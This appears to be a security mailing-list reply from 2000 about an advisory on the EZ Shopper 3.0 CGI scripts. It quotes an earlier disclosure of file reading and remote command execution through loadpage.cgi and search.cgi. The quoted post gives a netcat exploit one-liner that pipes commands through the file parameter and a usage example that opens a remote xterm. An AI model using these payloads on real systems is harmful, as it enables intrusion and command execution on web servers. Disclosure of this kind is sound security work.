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Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File ListDisclosure Vulnerability

From: Marshal <marshal () MARSHAL-SOFT COM>
Date: Sat, 16 Dec 2000 11:11:24 +0100

I also contacted AHG about it a long time ago, it seems that they had an
This update is still vuln, loadpage is possible to view any file above
the specified $root=
dir in the config file. but execution and viewing files with search is
no longer possible.
I contacted them about it, they did nothing.

But yes, this advisory is old news.

suid () SNEAKERZ ORG wrote:

Uhh... guys i dont really mean to dis you but...
It sometimes pays to research a bit before releasing advisories.
Here is something i posted (to bugtraq no less) on the 28 of feb this year.

k thx bye

suid () suid kg - EZ Shopper 3.0 remote command execution.

Software:       EZ Shopper 3.0
URL:            http://www.ahg.com/software.htm#ezshopper
Version:        Version 3.0
Platforms:      Unix, NT
Type:           CGI, Input validation problem
Vendor status:  Notified 26/02/2000
Date:           26/02/2000


        Anyone can execute any command on the remote system with
        the priveleges of the web server. Anyone can read any file
        on the remote system which the webserver has access to.


        The perl code does no input validation and performs an
        open() on a user supplied input.


        (1) loadpage.cgi - view any file.

        Firstly using your web browser find the current path (cwd):


        You will receive an error message like:

                Cannot open file /home/www/shop/XYZ

        Now simply use (example based on the above cwd):


        (2) loadpage.cgi - execute any command.

        This example shell script uses netcat to communicate with a
        HTTP proxy and exploit the script:


        echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080


        A usage example would be:

                $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

        (3) search.cgi - view files (retarded tho) and execute commands.

        Simply replace the database field with piped commands or path/filename.

user_id=1&database=<insert here>&template=<or insert here>&distinct=1

        Note if you use the database field a valid template is probably needed
        and vice versa.


        The vendor, AHG Inc, has released a fixed version, download it from
        their website and install the fixed version.



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